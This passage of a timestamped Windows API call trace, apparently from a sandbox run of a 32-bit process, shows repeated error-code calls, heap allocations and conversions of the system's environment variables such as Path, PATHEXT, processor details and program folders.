[0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.160] SetLastError (dwErrCode=0x0) [0173.160] GetLastError () returned 0x0 [0173.160] SetLastError (dwErrCode=0x0) [0173.160] GetLastError () returned 0x0 [0173.160] SetLastError (dwErrCode=0x0) [0173.160] GetLastError () returned 0x0 [0173.160] SetLastError (dwErrCode=0x0) [0173.160] GetLastError () returned 0x0 [0173.160] SetLastError (dwErrCode=0x0) [0173.160] GetLastError () returned 0x0 [0173.160] SetLastError (dwErrCode=0x0) [0173.160] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6410d0) returned 0x30 [0173.161] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6410d0, Size=0x34) returned 0x6410d0 [0173.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0173.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x17) returned 0x641110 [0173.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x641110, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0173.161] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] GetLastError () returned 0x0 [0173.161] SetLastError (dwErrCode=0x0) [0173.161] GetLastError () returned 0x0 [0173.162] SetLastError (dwErrCode=0x0) [0173.162] GetLastError () returned 0x0 [0173.162] SetLastError (dwErrCode=0x0) [0173.162] GetLastError () returned 0x0 [0173.162] SetLastError (dwErrCode=0x0) [0173.162] GetLastError () returned 0x0 [0173.162] SetLastError (dwErrCode=0x0) [0173.193] GetLastError () returned 0x0 [0173.193] SetLastError (dwErrCode=0x0) [0173.193] GetLastError () returned 0x0 [0173.193] SetLastError (dwErrCode=0x0) [0173.193] GetLastError () returned 0x0 [0173.193] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.194] GetLastError () returned 0x0 [0173.194] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6410d0) returned 0x34 [0173.195] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6410d0, Size=0x38) returned 0x6410d0 [0173.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0173.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe) returned 0x6332a0 [0173.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x6332a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.195] SetLastError (dwErrCode=0x0) [0173.195] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.196] SetLastError (dwErrCode=0x0) [0173.196] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.197] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.197] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.197] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.197] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.197] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.197] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.197] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.197] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6410d0) returned 0x38 [0173.197] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6410d0, Size=0x3c) returned 0x641130 [0173.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0173.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x95) returned 0x641178 [0173.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x641178, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0173.197] GetLastError () returned 0x0 [0173.197] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.198] SetLastError (dwErrCode=0x0) [0173.198] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.200] SetLastError (dwErrCode=0x0) [0173.200] GetLastError () returned 0x0 [0173.200] SetLastError (dwErrCode=0x0) [0173.200] GetLastError () returned 0x0 [0173.200] SetLastError (dwErrCode=0x0) [0173.200] GetLastError () returned 0x0 [0173.200] SetLastError (dwErrCode=0x0) [0173.200] GetLastError () returned 0x0 [0173.200] SetLastError (dwErrCode=0x0) [0173.200] GetLastError () returned 0x0 [0173.200] SetLastError (dwErrCode=0x0) [0173.200] GetLastError () returned 0x0 [0173.200] SetLastError (dwErrCode=0x0) [0173.200] GetLastError () returned 0x0 [0173.201] SetLastError (dwErrCode=0x0) [0173.201] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641130) returned 0x3c [0173.201] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641130, Size=0x40) returned 0x641130 [0173.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0173.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x632618 [0173.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x632618, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0173.201] GetLastError () returned 0x0 [0173.201] SetLastError (dwErrCode=0x0) [0173.201] GetLastError () returned 0x0 [0173.201] SetLastError (dwErrCode=0x0) [0173.201] GetLastError () returned 0x0 [0173.201] SetLastError (dwErrCode=0x0) [0173.201] GetLastError () returned 0x0 [0173.201] SetLastError (dwErrCode=0x0) [0173.201] GetLastError () returned 0x0 [0173.201] SetLastError (dwErrCode=0x0) [0173.201] GetLastError () returned 0x0 [0173.201] SetLastError (dwErrCode=0x0) [0173.201] GetLastError () returned 0x0 [0173.202] SetLastError (dwErrCode=0x0) [0173.202] GetLastError () returned 0x0 [0173.202] SetLastError (dwErrCode=0x0) [0173.202] GetLastError () returned 0x0 [0173.202] SetLastError (dwErrCode=0x0) [0173.203] GetLastError () returned 0x0 [0173.203] SetLastError (dwErrCode=0x0) [0173.203] GetLastError () returned 0x0 [0173.203] SetLastError (dwErrCode=0x0) [0173.203] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.204] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.204] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.204] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.204] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.204] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.204] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.205] GetLastError () returned 0x0 [0173.205] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641130) returned 0x40 [0173.205] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641130, Size=0x44) returned 0x641218 [0173.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0173.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1b) returned 0x63ee50 [0173.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x63ee50, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0173.205] GetLastError () returned 0x0 [0173.205] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x44 [0173.205] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x48) returned 0x641218 [0173.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0173.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1d) returned 0x63ee78 [0173.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x63ee78, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0173.205] GetLastError () returned 0x0 [0173.205] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x48 [0173.205] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x4c) returned 0x641218 [0173.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0173.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x637120 [0173.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x637120, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0173.205] GetLastError () returned 0x0 [0173.206] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x4c [0173.206] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x50) returned 0x641218 [0173.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0173.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x12) returned 0x6410d0 [0173.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x6410d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0173.207] GetLastError () returned 0x0 [0173.207] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x50 [0173.207] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x54) returned 0x641218 [0173.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0173.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x6410f0 [0173.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x6410f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0173.207] GetLastError () returned 0x0 [0173.207] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x54 [0173.207] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x58) returned 0x641218 [0173.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0173.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1b) returned 0x63eea0 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x63eea0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0173.208] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x58 [0173.208] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x5c) returned 0x641218 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0173.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63b080 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x63b080, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0173.208] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x5c [0173.208] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x60) returned 0x641218 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0173.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x29) returned 0x63b760 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x63b760, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0173.208] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x60 [0173.208] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x64) returned 0x641218 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0173.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x63eec8 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x63eec8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0173.208] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x64 [0173.208] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x68) returned 0x641218 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0173.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6b) returned 0x641288 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x641288, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0173.208] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x68 [0173.208] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x6c) returned 0x641300 [0173.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0173.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x17) returned 0x641130 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x641130, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0173.209] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x6c [0173.209] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x70) returned 0x641300 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0173.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x14) returned 0x641150 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x641150, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SESSIONNAME=Console", lpUsedDefaultChar=0x0) returned 20 [0173.209] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x70 [0173.209] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x74) returned 0x641300 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0173.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xf) returned 0x6332b8 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x6332b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0173.209] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x74 [0173.209] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x78) returned 0x641300 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0173.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x16) returned 0x641218 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x641218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0173.209] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x78 [0173.209] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x7c) returned 0x641300 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 